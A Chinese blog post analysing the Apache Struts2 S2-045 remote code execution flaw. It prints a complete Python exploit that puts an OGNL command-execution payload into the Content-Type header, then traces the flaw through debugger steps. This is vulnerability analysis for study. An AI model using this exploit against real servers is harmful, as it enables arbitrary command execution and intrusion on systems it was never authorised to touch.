漏洞分析马后炮 s2-045漏洞分析

最新推荐文章于 2022-04-14 14:37:43 发布
最新推荐文章于 2022-04-14 14:37:43 发布
阅读量2.7k 收藏 2
点赞数 1
分类专栏: Web渗透 文章标签: 漏洞 调试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lodog1/article/details/60893423
版权

漏洞分析马后炮 s2-045漏洞分析

本文包含如下内容:

0x00 目录

0x01 环境搭建

现成的符合版本要求的弱环境下载:

https://raw.githubusercontent.com/mottoin/S2-045/master/S2-045.war

0x02 PoC分析

网上下载的exp-s2-045,用来测试漏洞:

#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
    payload = "Content-Type:%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial
    print(page)
    return page

这里先不解释代码,配合后面的DEBUG来解释以上PoC代码。

0x03 代码DEBUG

运行PoC代码

运行PoC,成功即运行calc,弹出一个计算器
用法为

*.py [url] [cmd]

第一个断点

因为我事先分析过了,先在这里打个断点。
此时计算器还没弹出,我们继续跟进到方法:

getDefaultMessage(String, Locale, ValueStack, Object[], String)

跟进第一个方法

如下是defaultMessage的内容,他包含我们所有的Content-Type内容,我们跟进他在哪里被引用。

the request doesn’t contain a multipart/form-data or multipart/mixed stream, content type header is 【Content-Type内容】

message被代替成传入的参数

message = defaultMessage

buildMessageFormat(TextParseUtil.translateVariables(message, valueStack), locale);

该段为message最后被引用到的地方,跟进到两个方法内,先到如下:

translateVariables(String, ValueStack)

第一次跟进translateVariables方法

第一次跟进translateVariables方法,发现还是调用的方法,一路跟进,直接看实现具体的实现。

真正调用shell的方法
shell方法继承的接口

从这两张图可以看出,他继承了接口

com.opensymphony.xwork2.util.TextParseUtil.ParsedValueEvaluator

在创建对象后立即重写了方法:

com.opensymphony.xwork2.util.TextParseUtil.ParsedValueEvaluator.evaluate(String)

最后要知道是,为什么该方法是怎么执行构造的内容的。

先看看这个方法的API

evaluate

Object evaluate(String parsedValue)
Evaluated the value parsed by Ognl value stack.

这里提到Ognl值栈,我们只需要构造Ognl语句,利用Ognl语句获得cmd或者shell。

colodoo(纸伞)
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
S2-045之搬码工复现(含调整后能用的poc代码)
manic_pfy的博客
08-15 1041
S2-045复现(含调整能用的poc代码)概述S2-045官方解释复现过程实验环境Struts项目搭建版本需求漏洞复现脚本代码执行方式代码存在的问题问题解决复现效果漏洞解决方案 概述 写这篇文是因为在系统维护过程,发现安全系统拦截到了这个漏洞。但是网上教程大都简单描述,要不然就是照搬i春秋实验的过程,对于搬码工的我来说,CV操作用不了的,是真的看不懂好吗?i春秋的环境中的文件又不能拷贝出来,你们那...
ST2-045 For POC
热门推荐
龙哥盟
03-18 3万+
转载请注明: 转载自Legend‘s BLog 本文链接地址: ST2-045 For POC 利用方法:#! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import r
struts2 s2-045漏洞利用poc
isinstance的博客
03-10 6732
直接上代码了亲测有用 第一个是检测有没有这个漏洞的 import requestsimport sys def poc(url): payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con
Struts2爆远程代码执行漏洞(S2-045),附POC
weixin_33755847的博客
09-20 923
本文讲的是Struts2爆远程代码执行漏洞(S2-045),附POC, 今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个serv...
st2045 漏洞反弹root shell
weixin_34007291的博客
10-26 281
2019独角兽企业重金招聘Python工程师标准>>> ...
ASPEN PLUS与MATLAB联用例子-马后炮化工-航煤收率
最新发布
04-11
ASPEN PLUS与MATLAB联用例子-马后炮化工/航煤收率 jisuany anzheng.m energy.m checkout.m choice.m g enetic_operator.m initialize_variables.m non_domination_sort_mod.m nsga_2.m obje ctive_description_...
马后炮化工技术论坛-C4来源-基本成分和应用.doc
10-12
马后炮化工技术论坛-C4来源-基本成分和应用.doc
马后炮之12306抢票工具 终结版.zip
07-09
时隔一年多,终于朋友的忽悠下吧抢票Demo的最后一步完善了,与2014年1月9日成功生成车票。   Demo仅经过自己测试,并未在高峰期进行测试,代码质量很差,因为赶工,套用去年模板并未使用设计模式。...
马后炮化工技术论坛版.pptx
09-27
马后炮化工技术论坛版.pptx
小学语文近义词马后炮成语解释
09-09
小学语文近义词马后炮成语解释
管道无损检测python_s2-045 无损检测 PoC 分享
weixin_39917291的博客
12-30 241
这次的POC由网上公开的EXP修改而来,主要是由于该EXP具有一定的攻击性,所以我们做了一个无损检测的修改,。附上无损检测POC:#! /usr/bin/env python#coding: utf-8import requestsimport sysheader = dict()header['Content-Type'] = '%{(#nike='multipart/form-data').(...
struts2漏洞_学生会私房菜【20200723期】S2045 Remote Code Execution漏洞利用
weixin_39932300的博客
11-29 516
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:《S2-045 Remote Code Execution漏洞利用》作者介绍:Fhawkz福建师范大学18级学生,国科学生会安全团队的一员,本人对技术喜欢进行钻研,平时也爱鼓捣一些安全的相关技术,本次分享是自己在日常学习中有用到的一些技术,希望给大家带来一些安全学习上的...
linux struts2漏洞,重大漏洞预警:Struts 2 远程代码执行漏洞(s2-045\s2-046) (含PoC)
weixin_39612677的博客
05-16 448
背景介绍近日,安全研究人员发现著名J2EE框架——Struts2存在远程代码执行的漏洞,Struts2官方已经确认该漏洞(S2-045,S2-046),并定级为高危漏洞。Struts2的使用范围及其广泛,国内外均有大量厂商使用该框架。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立...
s2-045漏洞分析
Exploit的小站~
05-10 1万+
这个分析写的我有点汗颜,强烈建议抵制struts2,改为更加可靠的SpringMVC。 背景是,Struts2默认处理multipart报文的解析器是jakarta,是这个组件出现了问题。 该组件定义在了struts-default.xml中,因此,只要不修改parser,并且版本在受影响范围内,肯定是有问题的。 令我非常疑惑的是,一个content-type怎么就能用ognl解析...
Struts2 漏洞复现之s2-045
weixin_51220765的博客
12-14 2685
Struts2 漏洞复现之s2-045 原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响版本: Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 1.进入045 cd vulhub-master/struts2/s2-045 2.开启045 docker-compose up -d
s2-045 java_Struts2爆远程代码执行漏洞(S2-045),附POC | 极安全-JiSec
weixin_36265390的博客
02-12 262
今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞(漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2...
S2-045漏洞之简单分析+实战
BlingSmile的博客
04-12 1万+
0X00 前言:尽管s2-045的poc已经烂大街了,博主只是想学习了解一下它的用法,顺带写了一个测试小工具。0x01 漏洞简介Apache Struts是一套用于创建企业级Java Web 应用的开源MVC框架 。 Apache Struts 2.3.5 – 2.3.31版本及2.5 – 2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152 ,CVE-2017-5638)。该漏
Struts2远程代码执行漏洞S2-045利用及修复
u014416842的博客
04-13 4168
升级到struts-2.3.32, 发现无法调用getter方法public class Action { private Map yTypeList = new LinkedHashMap(); // getYtypeList public Map getYTypeList() { yTypeList.put("a", "invalid yTypeList a");
渗透测试-struts2攻防环境搭建拿shell
lza20001103的博客
04-14 1985
渗透测试之struts2攻防环境搭建
马后炮化工技术论坛光盘5AspenEnergyAnalyzer.pptx
10-10
马后炮化工技术论坛光盘5-Aspen Energy Analyzer中介绍了夹点技术在化工过程中的应用。夹点技术是一种以热力学为基础,以最小能耗为主要目标的换热网络综合方法。该技术由Linnhoff等人在1978年提出,指出夹点限制了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值